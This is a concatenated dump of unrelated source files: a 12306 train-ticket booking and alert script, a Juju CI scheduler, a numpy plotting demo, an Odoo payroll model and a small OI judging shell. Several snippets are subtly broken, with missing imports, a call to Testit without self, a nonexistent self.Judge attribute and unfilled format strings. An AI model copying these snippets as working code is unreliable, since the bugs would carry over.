print(u'正在发送邮件提醒...')
me = u'订票提醒<%s>' % (self.notify['mail_username'])
msg = MIMEText(
self.notify['mail_content'],
_subtype='plain',
_charset='gb2312')
msg['Subject'] = u'余票信息'
msg['From'] = me
msg['To'] = ';'.join(self.notify['mail_to'])
try:
server = smtplib.SMTP()
server.connect(self.notify['mail_server'])
server.login(
self.notify['mail_username'],
self.notify['mail_password'])
server.sendmail(me, self.notify['mail_to'], msg.as_string())
server.close()
print(u'发送邮件提醒成功')
return True
except Exception as e:
print(u'发送邮件提醒失败, %s' % str(e))
return False
def printTrains(self):
printDelimiter()
print(u'余票查询结果如下:')
print(u"%s\t%s--->%s\n'有':票源充足 '无':票已售完 '*':未到起售时间 '--':无此席别" % (
self.train_date,
self.from_city_name,
self.to_city_name))
printDelimiter()
print(u'序号/车次\t乘车站\t目的站\t一等\t二等\t软卧\t硬卧\t硬座\t无座')
seatTypeCode = {
'swz': '商务座',
'tz': '特等座',
'zy': '一等座',
'ze': '二等座',
'gr': '高级软卧',
'rw': '软卧',
'yw': '硬卧',
'rz': '软座',
'yz': '硬座',
'wz': '无座',
'qt': '其它',
}
# TODO 余票数量和票价 https://kyfw.12306.cn/otn/leftTicket/queryTicketPrice?train_no=770000K77505&from_station_no=09&to_station_no=13&seat_types=1431&train_date=2014-01-01
# yp_info=4022300000301440004610078033421007800536 代表
# 4022300000 软卧0
# 3014400046 硬卧46
# 1007803342 无座342
# 1007800536 硬座536
index = 1
self.notify['mail_content'] = ''
for train in self.trains:
t = train['queryLeftNewDTO']
status = '售完' if t['canWebBuy'] == 'N' else '预定'
i = 0
ypInfo = {
'wz': { # 无座
'price': 0,
'left': 0
},
'yz': { # 硬座
'price': 0,
'left': 0
},
'yw': { # 硬卧
'price': 0,
'left': 0
},
'rw': { # 软卧
'price': 0,
'left': 0
},
}
# 分析票价和余票数量
while i < (len(t['yp_info']) / 10):
tmp = t['yp_info'][i * 10:(i + 1) * 10]
price = int(tmp[1:5])
left = int(tmp[-3:])
if tmp[0] == '1':
if tmp[6] == '3':
ypInfo['wz']['price'] = price
ypInfo['wz']['left'] = left
else:
ypInfo['yz']['price'] = price
ypInfo['yz']['left'] = left
elif tmp[0] == '3':
ypInfo['yw']['price'] = price
ypInfo['yw']['left'] = left
elif tmp[0] == '4':
ypInfo['rw']['price'] = price
ypInfo['rw']['left'] = left
i = i + 1
yz_price = u'硬座%s' % (
ypInfo['yz']['price']) if ypInfo['yz']['price'] else ''
yw_price = u'硬卧%s' % (
ypInfo['yw']['price']) if ypInfo['yw']['price'] else ''
print(u'(%d) %s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s' % (
index,
t['station_train_code'],
t['from_station_name'][0:3], # 最多保留3个中文
t['to_station_name'][0:3], # 最多保留3个中文
t['zy_num'],
t['ze_num'],
ypInfo['rw']['left'] if ypInfo['rw']['left'] else t['rw_num'],
ypInfo['yw']['left'] if ypInfo['yw']['left'] else t['yw_num'],
#t['rz_num'],
ypInfo['yz']['left'] if ypInfo['yz']['left'] else t['yz_num'],
ypInfo['wz']['left'] if ypInfo['wz']['left'] else t['wz_num'],
#yz_price,
#yw_price
))
if t['canWebBuy'] == 'Y':
self.canWebBuy = True
index += 1
if self.notify['mail_enable'] == 1 and t['canWebBuy'] == 'Y':
msg = ''
prefix = u'[%s]车次%s[%s/%s->%s/%s, 历时%s]现在有票啦\n' % (
t['start_train_date'],
t['station_train_code'],
t['from_station_name'],
t['start_time'],
t['to_station_name'],
t['arrive_time'],
t['lishi'])
if 'all' in self.notify['focus']: # 任意车次
if self.notify['focus']['all'][0] == 'all': # 任意席位
msg = prefix
else: # 指定席位
for seat in self.notify['focus']['all']:
if seat in ypInfo and ypInfo[seat]['left']:
msg += u'座位类型:%s, 剩余车票数量:%s, 票价:%s \n' % (
seat if seat not in seatTypeCode else seatTypeCode[seat],
ypInfo[seat]['left'],
ypInfo[seat]['price'])
if msg:
msg = prefix + msg + u'\n'
elif t['station_train_code'] in self.notify['focus']: # 指定车次
# 任意席位
if self.notify['focus'][t['station_train_code']][0] == 'all':
msg = prefix
else: # 指定席位
for seat in self.notify['focus'][t['station_train_code']]:
if seat in ypInfo and ypInfo[seat]['left']:
msg += u'座位类型:%s, 剩余车票数量:%s, 票价:%s \n' % (
seat if seat not in seatTypeCode else seatTypeCode[seat],
ypInfo[seat]['left'],
ypInfo[seat]['price'])
if msg:
msg = prefix + msg + u'\n'
self.notify['mail_content'] += msg
printDelimiter()
if self.notify['mail_enable'] == 1:
if self.notify['mail_content']:
self.sendMailNotification()
return RET_OK
else:
length = len(self.notify['dates'])
if length > 1:
self.train_date = self.notify['dates'][
random.randint(
0,
length -
1)]
return RET_ERR
else:
return RET_OK
# -1->重新查询/0->退出程序/1~len->车次序号
def selectAction(self):
ret = -1
self.current_train_index = 0
trains_num = len(self.trains)
print(u'您可以选择:')
if self.canWebBuy:
print(u'1~%d.选择车次开始订票' % (trains_num))
print(u'p.更换乘车人')
print(u's.更改席别')
print(u'd.更改乘车日期')
print(u'f.更改出发站')
print(u't.更改目的站')
print(u'a.同时更改乘车日期,出发站和目的站')
print(u'u.查询未完成订单')
print(u'c.查看订票信息')
print(u'r.刷票模式')
print(u'n.普通模式')
print(u'q.退出')
print(u'刷新车票请直接回车')
printDelimiter()
select = raw_input()
select = select.lower()
if select.isdigit():
if not self.canWebBuy:
print(u'没有可预订的车次, 请刷新车票或者更改查询条件')
return -1
index = int(select)
if index < 1 or index > trains_num:
print(u'输入的序号无效,请重新选择车次(1~%d)' % (trains_num))
index = selectTrain(self.trains)
if self.trains[index - 1]['queryLeftNewDTO']['canWebBuy'] != 'Y':
print(u'您选择的车次%s没票啦,请重新选择车次' % (self.trains[index - 1]['queryLeftNewDTO']['station_train_code']))
index = selectTrain(self.trains)
ret = index
self.current_train_index = index - 1
elif select == 'p':
self.selectPassengers(0)
elif select == 's':
seattype = selectSeatType()
for p in self.passengers:
p['seattype'] = seattype
self.printConfig()
elif select == 'd':
self.train_date = selectDate()
elif select == 'f':
print(u'请输入出发站:')
station = inputStation()
self.from_city_name = station['name']
self.from_station_telecode = station['telecode']
elif select == 't':
print(u'请输入目的站:')
station = inputStation()
self.to_city_name = station['name']
self.to_station_telecode = station['telecode']
elif select == 'a':
self.train_date = selectDate()
print(u'请输入出发站:')
station = inputStation()
self.from_city_name = station['name']
self.from_station_telecode = station['telecode']
print(u'请输入目的站:')
station = inputStation()
self.to_city_name = station['name']
self.to_station_telecode = station['telecode']
elif select == 'u':
ret = self.queryMyOrderNotComplete()
ret = self.selectAction()
elif select == 'c':
ret = self.printConfig()
ret = self.selectAction()
elif select == 'r':
self.notify['mail_enable'] = 1
ret = -1
elif select == 'n':
self.notify['mail_enable'] = 0
ret = -1
elif select == 'q':
ret = 0
return ret
def initOrder(self):
url = 'https://kyfw.12306.cn/otn/login/checkUser'
parameters = [
('_json_att', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'初始化订单异常')
print(u'准备下单喽')
url = 'https://kyfw.12306.cn/otn/leftTicket/submitOrderRequest'
parameters = [
#('ODA4NzIx', 'MTU0MTczYmQ2N2I3MjJkOA%3D%3D'),
('myversion', 'undefined'),
('secretStr', self.trains[self.current_train_index]['secretStr']),
('train_date', self.train_date),
('back_train_date', self.back_train_date),
('tour_flag', self.tour_flag),
('purpose_codes', self.purpose_code),
('query_from_station_name', self.from_city_name),
('query_to_station_name', self.to_city_name),
('undefined', '')
]
# TODO 注意:此处post不需要做urlencode, 比较奇怪, 不能用urllib.urlencode(parameters)
payload = ''
length = len(parameters)
for i in range(0, length):
payload += parameters[i][0] + '=' + parameters[i][1]
if i < (length - 1):
payload += '&'
r = self.post(url, payload)
if not r:
print(u'下单异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"messages":[],"validateMessages":{}}
obj = r.json()
if not (hasKeys(obj, ['status', 'httpstatus'])
and obj['status']):
print(u'下单失败啦')
dumpObj(obj)
return RET_ERR
print(u'订单初始化...')
self.session.close() # TODO
url = 'https://kyfw.12306.cn/otn/confirmPassenger/initDc'
parameters = [
('_json_att', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'订单初始化异常')
return RET_ERR
data = r.text
s = data.find('globalRepeatSubmitToken') # TODO
e = data.find('global_lang')
if s == -1 or e == -1:
print(u'找不到 globalRepeatSubmitToken')
return RET_ERR
buf = data[s:e]
s = buf.find("'")
e = buf.find("';")
if s == -1 or e == -1:
print(u'很遗憾, 找不到 globalRepeatSubmitToken')
return RET_ERR
self.repeatSubmitToken = buf[s + 1:e]
s = data.find('key_check_isChange')
e = data.find('leftDetails')
if s == -1 or e == -1:
print(u'找不到 key_check_isChange')
return RET_ERR
self.keyCheckIsChange = data[s + len('key_check_isChange') + 3:e - 3]
return RET_OK
def checkOrderInfo(self):
if self.checkRandCodeAnsyn('passenger') == RET_ERR:
return RET_ERR
passengerTicketStr = ''
oldPassengerStr = ''
passenger_seat_detail = '0' # TODO [0->随机][1->下铺][2->中铺][3->上铺]
for p in self.passengers:
if p['index'] != 1:
passengerTicketStr += 'N_'
oldPassengerStr += '1_'
passengerTicketStr += '%s,%s,%s,%s,%s,%s,%s,' % (
p['seattype'],
passenger_seat_detail,
p['tickettype'],
p['name'],
p['cardtype'],
p['id'],
p['phone'])
oldPassengerStr += '%s,%s,%s,' % (
p['name'],
p['cardtype'],
p['id'])
passengerTicketStr += 'N'
oldPassengerStr += '1_'
self.passengerTicketStr = passengerTicketStr
self.oldPassengerStr = oldPassengerStr
print(u'检查订单...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/checkOrderInfo'
parameters = [
('cancel_flag', '2'), # TODO
('bed_level_order_num', '000000000000000000000000000000'), # TODO
('passengerTicketStr', self.passengerTicketStr),
('oldPassengerStr', self.oldPassengerStr),
('tour_flag', self.tour_flag),
('randCode', self.captcha),
#('NzA4MTc1', 'NmYyYzZkYWY2OWZkNzg2YQ%3D%3D'), # TODO
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'检查订单异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"submitStatus":true},"messages":[],"validateMessages":{}}
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['submitStatus'])
and obj['status']
and obj['data']['submitStatus']):
print(u'检查订单成功')
return RET_OK
else:
print(u'检查订单失败')
dumpObj(obj)
return RET_ERR
def getQueueCount(self):
print(u'查询排队情况...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/getQueueCount'
t = self.trains[self.current_train_index]['queryLeftNewDTO']
parameters = [
('train_date', date2UTC(self.train_date)),
('train_no', t['train_no']),
('stationTrainCode', t['station_train_code']),
('seatType', '1'), # TODO
('fromStationTelecode', t['from_station_telecode']),
('toStationTelecode', t['to_station_telecode']),
('leftTicket', t['yp_info']),
('purpose_codes', '00'), # TODO
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken)
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'查询排队情况异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"count":"0","ticket":"100985109710098535003021350212","op_2":"false","countT":"0","op_1":"false"},"messages":[],"validateMessages":{}}
obj = r.json()
if not (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['op_1', 'op_2'])
and obj['status']):
print(u'查询排队情况失败')
dumpObj(obj)
return RET_ERR
if obj['data']['op_1'] != 'false':
print(u'已有人先于您提交相同的购票需求, 到处理您的需求时可能已无票, 建议根据当前余票确定是否排队.')
if obj['data']['op_2'] != 'false':
print(u'目前排队人数已经超过余票张数,请您选择其他席别或车次,特此提醒。')
if 'ticket' in obj['data']:
print(u'排队详情:%s' % (obj['data']['ticket'])) # TODO
return RET_OK
def confirmSingleForQueue(self):
print(u'提交订单排队...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/confirmSingleForQueue'
t = self.trains[self.current_train_index]['queryLeftNewDTO']
parameters = [
('passengerTicketStr', self.passengerTicketStr),
('oldPassengerStr', self.oldPassengerStr),
('randCode', self.captcha),
('purpose_codes', '00'), # TODO
('key_check_isChange', self.keyCheckIsChange),
('leftTicketStr', t['yp_info']),
('train_location', t['location_code']),
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'提交订单排队异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"submitStatus":true},"messages":[],"validateMessages":{}}
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['submitStatus'])
and obj['status'] and obj['data']['submitStatus']):
print(u'订单排队中...')
return RET_OK
else:
print(u'提交订单排队失败')
dumpObj(obj)
return RET_ERR
def queryOrderWaitTime(self):
print(u'等待订单流水号...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/queryOrderWaitTime?random=%13d&tourFlag=dc&_json_att=&REPEAT_SUBMIT_TOKEN=%s' % (
random.randint(1000000000000, 1999999999999), self.repeatSubmitToken)
r = self.get(url)
if not r:
print(u'等待订单流水号异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"queryOrderWaitTimeStatus":true,"count":0,"waitTime":4,"requestId":5944637152210732219,"waitCount":2,"tourFlag":"dc","orderId":null},"messages":[],"validateMessages":{}}
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"queryOrderWaitTimeStatus":true,"count":0,"waitTime":-1,"requestId":5944637152210732219,"waitCount":0,"tourFlag":"dc","orderId":"E739900792"},"messages":[],"validateMessages":{}}
obj = r.json()
if not (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['orderId'])
and obj['status']
and obj['data']['orderId']):
print(u'等待订单流水号失败')
dumpObj(obj)
return RET_ERR
self.orderId = obj['data']['orderId']
if (self.orderId and self.orderId != 'null'):
print(u'订单流水号为:')
print(self.orderId)
return RET_OK
else:
print(u'等待订单流水号失败')
return RET_ERR
def payOrder(self):
print(u'等待订票结果...')
url = 'https://kyfw.12306.cn/otn/confirmPassenger/resultOrderForDcQueue'
parameters = [
('orderSequence_no', self.orderId),
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'等待订票结果异常')
return RET_ERR
# {'validateMessagesShowId':'_validatorMessage','status':true,'httpstatus':200,'data':{'submitStatus':true},'messages':[],'validateMessages':{}}
# {'validateMessagesShowId':'_validatorMessage','status':true,'httpstatus':200,'data':{'errMsg':'获取订单信息失败,请查看未完成订单,继续支付!','submitStatus':false},'messages':[],'validateMessages':{}}
obj = r.json()
if not (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['submitStatus'])
and obj['status']
and obj['data']['submitStatus']):
print(u'等待订票结果失败')
dumpObj(obj)
return RET_ERR
url = 'https://kyfw.12306.cn/otn//payOrder/init?random=%13d' % (
random.randint(1000000000000, 1999999999999))
parameters = [
('_json_att', ''),
('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'请求异常')
return RET_ERR
data = r.text
if data.find(u'席位已锁定') != -1:
print(u'订票成功^_^请在45分钟内完成网上支付,否则系统将自动取消')
return RET_OK
else:
return RET_ERR
def queryMyOrderNotComplete(self):
print(u'正在查询未完成订单...')
url = 'https://kyfw.12306.cn/otn/queryOrder/queryMyOrderNoComplete'
parameters = [
('_json_att', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'查询未完成订单异常')
return RET_ERR
obj = r.json()
if not (hasKeys(obj, ['status', 'httpstatus', 'data']) and obj['status']):
print(u'查询未完成订单失败')
dumpObj(obj)
return RET_ERR
if (hasKeys(obj['data'], ['orderDBList']) and len(obj['data']['orderDBList'])):
print(u'查询到有未完成订单,请先处理')
return RET_OK
if (
hasKeys(obj['data'], ['orderCacheDTO'])
and obj['data']['orderCacheDTO']
and hasKeys(obj['data']['orderCacheDTO'], ['status'])):
if obj['data']['orderCacheDTO']['status'] == 0:
print(u'查询到cache有未完成订单,请先处理')
return RET_OK
else:
if (hasKeys(obj['data']['orderCacheDTO'], ['message'])):
dumpObj(obj['data']['orderCacheDTO']['message'])
return RET_ERR
def main():
print(getTime())
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--config', help='Specify config file')
parser.add_argument('-u', '--username', help='Specify username to login')
parser.add_argument('-p', '--password', help='Specify password to login')
parser.add_argument('-d', '--date', help='Specify train date, 2014-01-01')
parser.add_argument('-m', '--mail', help='Send email notification')
args = parser.parse_args()
order = MyOrder()
order.initSession()
order.initStation()
if args.config:
order.readConfig(args.config) # 使用指定的配置文件
else:
order.readConfig() # 使用默认的配置文件config.ini
if args.username:
order.username = args.username # 使用指定的账号代替配置文件中的账号
if args.password:
order.password = args.password # 使用指定的密码代替配置文件中的密码
if args.date:
if checkDate(args.date):
order.train_date = args.date # 使用指定的乘车日期代替配置文件中的乘车日期
else:
print(u'乘车日期无效, 请重新选择')
order.train_date = selectDate()
if args.mail:
# 有票时自动发送邮件通知
order.notify['mail_enable'] = 1 if args.mail == '1' else 0
tries = 0
while tries < MAX_TRIES:
tries += 1
if order.login() == RET_OK:
break
else:
print(u'失败次数太多,自动退出程序')
sys.exit()
order.selectPassengers(1)
while True:
time.sleep(1)
# 查询车票
if order.queryTickets() != RET_OK:
continue
# 显示查询结果
if order.printTrains() != RET_OK:
continue
# 选择菜单列举的动作之一
action = order.selectAction()
if action == -1:
continue
elif action == 0:
break
# 订单初始化
if order.initOrder() != RET_OK:
continue
# 检查订单信息
if order.checkOrderInfo() != RET_OK:
continue
# 查询排队和余票情况
# if order.getQueueCount() != RET_OK:
# continue
# 提交订单到队里中
tries = 0
while tries < 2:
tries += 1
if order.confirmSingleForQueue() == RET_OK:
break
# 获取orderId
tries = 0
while tries < 2:
tries += 1
if order.queryOrderWaitTime() == RET_OK:
break
# 正式提交订单
if order.payOrder() == RET_OK:
break
# 访问未完成订单页面检查是否订票成功
if order.queryMyOrderNotComplete() == RET_OK:
print(u'订票成功^_^请在45分钟内完成网上支付,否则系统将自动取消')
break
print(getTime())
raw_input('Press any key to continue')
if __name__ == '__main__':
main()
# EOF
| gpl-2.0 | -631,110,503,267,683,200 | 37.075581 | 273 | 0.491627 | false |
mjs/juju | acceptancetests/schedule_hetero_control.py | 1 | 3284 | #!/usr/bin/env python
from __future__ import print_function
from argparse import ArgumentParser
import json
import os
import re
from jenkins import Jenkins
from jujuci import (
add_credential_args,
get_credentials,
)
from utility import (
find_candidates,
get_candidates_path,
)
def get_args(argv=None):
parser = ArgumentParser()
parser.add_argument(
'root_dir', help='Directory containing releases and candidates dir')
parser.add_argument(
'--all', action='store_true', default=False,
help='Schedule all candidates for client-server testing.')
add_credential_args(parser)
args = parser.parse_args(argv)
return args, get_credentials(args)
def get_releases(root):
release_path = os.path.join(root, 'old-juju')
released_pattern = re.compile('^\d+\.\d+\.\d+[^~]*$')
for entry in os.listdir(release_path):
if not os.path.isdir(os.path.join(release_path, entry)):
continue
if released_pattern.match(entry):
yield entry
def get_candidate_info(candidate_path):
""" Return candidate version and revision build number. """
with open(os.path.join(candidate_path, 'buildvars.json')) as fp:
build_vars = json.load(fp)
return build_vars['version'], build_vars['revision_build']
def calculate_jobs(root, schedule_all=False):
releases = list(get_releases(root))
candidates_path = get_candidates_path(root)
for candidate_path in find_candidates(root, schedule_all):
parent, candidate = os.path.split(candidate_path)
if candidate.startswith('1.26'):
# 1.26 was renamed to 2.0 because it is not compatible with 1.x
continue
if parent != candidates_path:
raise ValueError('Wrong path')
candidate_version, revision_build = get_candidate_info(candidate_path)
for release in releases:
# Releases with the same major number must be compatible.
if release[:2] != candidate[:2]:
continue
for client_os in ('ubuntu', 'osx', 'windows'):
yield {
'old_version': release, # Client
'candidate': candidate_version, # Server
'new_to_old': 'true',
'candidate_path': candidate,
'client_os': client_os,
'revision_build': revision_build,
}
yield {
'old_version': release, # Server
'candidate': candidate_version, # Client
'new_to_old': 'false',
'candidate_path': candidate,
'client_os': client_os,
'revision_build': revision_build,
}
def build_jobs(credentials, root, jobs):
jenkins = Jenkins('http://juju-ci.vapour.ws:8080', *credentials)
os_str = {"ubuntu": "", "osx": "-osx", "windows": "-windows"}
for job in jobs:
jenkins.build_job(
'compatibility-control{}'.format(os_str[job['client_os']]), job)
def main():
args, credentials = get_args()
build_jobs(
credentials, args.root_dir, calculate_jobs(args.root_dir, args.all))
if __name__ == '__main__':
main()
| agpl-3.0 | 8,702,900,788,134,910,000 | 32.510204 | 78 | 0.58648 | false |
NicovincX2/Python-3.5 | Algèbre/Opération/scalar_product.py | 1 | 1933 | # -*- coding: utf-8 -*-
import os
import seaborn
seaborn.set()
colors = seaborn.color_palette()
import utils
# For 3D plotting we need to import some extra stuff
from mpl_toolkits.mplot3d import Axes3D
# First create two random vectors in 3 dimensional space
v1 = rand(3, 1)
v2 = rand(3, 1)
# And scale them to unit length
v1 = v1 / norm(v1)
v2 = v2 / norm(v2)
# Plot the vectors
o = zeros(3) # origin
# We'll use the object oriented plotting interface
f = figure(figsize=(8, 8))
ax = f.add_subplot(111, projection="3d", axisbg="white")
ax.plot(*[[o[i], v1[i]] for i in range(3)], linewidth=3, label="vector1")
ax.plot(*[[o[i], v2[i]] for i in range(3)], linewidth=3, label="vector2")
for axisl in ["x", "y", "z"]:
getattr(ax, "set_%slabel" % axisl)(axisl) # Here's a fun trick
legend()
f = figure(figsize=(8, 8))
ax = f.add_subplot(111, projection="3d", axisbg="white")
ax.plot(*[[o[i], v1[i]] for i in range(3)], linewidth=3, label="vector1")
ax.plot(*[[o[i], v2[i]] for i in range(3)], linewidth=3, label="vector2")
for axisl in ["x", "y", "z"]:
getattr(ax, "set_%slabel" % axisl)(axisl) # Here's a fun trick
legend()
for i in range(100):
# generate a point that is a weighted sum of the 2 vectors
w1 = randn(1)
w2 = randn(1)
point = w1 * v1 + w2 * v2
ax.plot(*point, marker=".", color="k")
# We can find a vector that is orthogonal to the plane defined by v1 and v2
# by taking the vector cross product. See the wikipedia page for a
# definition of cross product
# Must be right shape for cross()
v3 = cross(v1.reshape(1, 3), v2.reshape(1, 3)).squeeze()
ax.plot(*[[o[i], v3[i]] for i in range(3)],
linewidth=3, label="orthogonal vector")
legend()
print(v3[0] * v1[0] + v3[1] * v1[1] + v3[2] * v1[2])
print(dot(v3, v1))
theta = arccos(dot(v2.T, v1)).squeeze()
# and radians can be converted to degrees
theta_deg = theta * (180 / pi)
print(theta, theta_deg)
os.system("pause")
| gpl-3.0 | -667,495,029,262,324,100 | 28.287879 | 75 | 0.644594 | false |
nuobit/odoo-addons | connector_sage/models/payroll_sage_payslip_line_payroll/binding.py | 1 | 1439 | # Copyright NuoBiT Solutions, S.L. (<https://www.nuobit.com>)
# Eric Antones <[email protected]>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl)
from odoo import models, fields
from odoo.addons.queue_job.job import job
class PayslipLinePayrollBinding(models.Model):
_name = 'sage.payroll.sage.payslip.line.payroll'
_inherit = 'sage.payroll.sage.payslip.line'
_sql_constraints = [
('uniq',
'unique(sage_codigo_empresa, sage_codigo_convenio, sage_fecha_registro_cv, '
'sage_ano, sage_mesd, sage_tipo_proceso, '
'sage_codigo_empleado, sage_codigo_concepto_nom)',
'Payroll Payslip with same ID on Sage already exists.'),
]
@job(default_channel='root.sage')
def import_payslip_lines(self, payslip_id, backend_record):
""" Prepare the import of payslip from Sage """
filters = {
'CodigoEmpresa': backend_record.sage_company_id,
'CodigoConvenio': payslip_id.labour_agreement_id.code,
'FechaRegistroCV': fields.Date.from_string(payslip_id.labour_agreement_id.registration_date_cv),
'Año': payslip_id.year,
'MesD': ('between', (payslip_id.month_from, payslip_id.month_to)),
'TipoProceso': payslip_id.process,
}
self.env['sage.payroll.sage.payslip.line.payroll'].import_batch(
backend=backend_record, filters=filters)
return True
| agpl-3.0 | 8,891,023,557,051,853,000 | 36.842105 | 108 | 0.649513 | false |
cuihaoleo/PyTest | PyTest.py | 1 | 7675 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
##
# PyTest.py
# This file is part of PyTest.
#
# PyTest
# Python编写的OI评测器后端
# Copyright (C) 2011 CUI Hao
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Author: 崔灏 (CUI Hao)
# Email: [email protected]
##
import cmd
import os
import shlex
import pickle
from PlayerClass import PyTest_Player
from ProblemClass import PyTest_Problem
from ProblemConfig import Cfg2Prob
class PyTest_Cmd (cmd.Cmd):
def __init__ (self):
cmd.Cmd.__init__(self)
self.prompt = "(PyTest) "
self.Name = "Unnamed"
self.Players = {}
self.Problems = {}
self.do_EOF = self.do_quit
def AddProb (self, cfg):
try:
prob = Cfg2Prob(cfg)
except Exception as exp:
print("无法添加题目 %s : 导入时发生错误")
print(exp)
else:
if prob.Name in self.Problems.keys():
print("无法添加题目 %s : 相同名称的题目已存在" % prob.Name)
else:
self.Problems[prob.Name] = prob
print("添加题目 %s" % prob.Name)
def AddPlayer (self, path):
try:
player = PyTest_Player(path)
except Exception as exp:
print("无法添加选手 %s : 导入时发生错误")
print(exp)
else:
if player.Name in self.Players.keys():
print("无法添加选手 %s : 相同名称的对象已存在" % player.Name)
else:
self.Players[player.Name] = player
print("添加选手 %s" % player.Name)
def DelProb (self, name):
try:
del self.Problems[name]
except KeyError:
print("无法删除题目 %s : 题目不存在" % name)
else:
print("删除题目 %s" % name)
def DelPlayer (self, name):
try:
del self.Players[name]
except KeyError:
print("无法删除选手 %s : 对象不存在" % name)
else:
print("删除选手 %s" % name)
def Testit (self, pl, pr):
try:
player = self.Players[pl]
except KeyError:
print("未知用户 %s" % pl)
return
try:
prob = self.Problems[pr]
except KeyError:
print("未知用户 %s" % pr)
return
player.Do(prob)
def help_quit (self):
print("quit")
print("退出")
def do_quit (self, line):
exit()
def help_name (self):
print("name [@名称]")
print("设置评测名称。若没有提供,显示当前名称")
def do_name (self, name):
if len(name.strip()) == 0:
print(self.Judge.Name)
else:
self.Judge.Name = name
def help_addprob (self):
print("addprob @配置文件1 [@配置文件2 [...]]")
print("添加题目")
def do_addprob (self, line):
for path in shlex.split(line):
self.AddProb(path)
def help_delprob (self):
print("delprob @题目1 [@题目2 [...]]")
print("删除题目")
def do_delprob (self, line):
for name in shlex.split(line):
self.DelProb(name)
def help_prob (self):
print("prob")
print("显示所有题目")
def do_prob (self, line):
for p in self.Problems:
print("%s: %s" % (p, self.Problems[p].CfgFile))
def help_add (self):
print("add @目录1 [@目录2 [...]]")
print("添加选手")
def do_add (self, line):
for path in shlex.split(line):
self.AddPlayer(path)
def help_addall (self):
print("addall @目录1 [@目录2 [...]]")
print("添加目录中的所有文件夹作为选手")
def do_addall (self, line):
for path in shlex.split(line):
try:
paths = next(os.walk(path))[1]
except StopIteration:
continue
for f in paths:
self.AddPlayer(os.path.join(path, f))
def help_del (self):
print("del @选手1 [@选手2 [...]]")
print("删除选手")
def do_del (self, line):
for name in shlex.split(line):
self.DelPlayer(name)
def help_player (self):
print("player")
print("显示所有选手")
def do_player (self, line):
for p in self.Players:
print("%s: %s" % (p, self.Players[p].Path))
def help_rec (self):
print("rec @选手 @题目")
print("显示详细评测信息")
def do_rec (self, line):
arg = shlex.split(line)
if len(arg)==2:
pl, pr = arg
else:
return
try:
li = self.Players[pl].Record[pr]
except KeyError:
print("记录不存在")
return
for idx in li:
print()
print("[测试#%s]" % idx)
for dic in li[idx]:
print("<文件 %s>" % dic.get("file", ""))
print("信息: %s" % dic.get("msg", ""))
print("得分: %s" % dic.get("score", ""))
def help_print (self):
print("打印Python表达式")
def do_print (self, line):
try:
print(eval(line))
except Exception as err:
print(err)
def help_test (self):
print("启动测试")
def do_test (self, line):
arg = shlex.split(line)
if len(arg) == 2:
Testit(*arg)
elif len(arg) == 0:
pls = input("测试对象(默认全部):").split()
prs = input("题目(默认全部):").split()
if len(pls) == 0:
pls = self.Players.keys()
if len(prs) == 0:
prs = self.Problems.keys()
for player in pls:
for prob in prs:
self.Testit(player, prob)
print()
def help_save (self):
print("储存本次测试")
def do_save (self, line):
path = shlex.split(line)[0]
if os.path.lexists(path):
while True:
ch = input("文件已存在,是否覆盖(Y/N)?")
if ch in ("y", "Y"):
break
elif ch in ("n", "N"):
return
f = open(path, "wb")
pickle.dump(self.Name, f, pickle.HIGHEST_PROTOCOL)
pickle.dump(self.Players, f, pickle.HIGHEST_PROTOCOL)
pickle.dump(self.Problems, f, pickle.HIGHEST_PROTOCOL)
f.close()
def help_load (self):
print("加载测试")
def do_load (self, line):
path = shlex.split(line)[0]
try:
f = open(path, "rb")
except IOError as err:
print(err)
return
self.Name = pickle.load(f)
self.Players = pickle.load(f)
self.Problems = pickle.load(f)
if __name__ == '__main__':
pytest = PyTest_Cmd()
pytest.cmdloop()
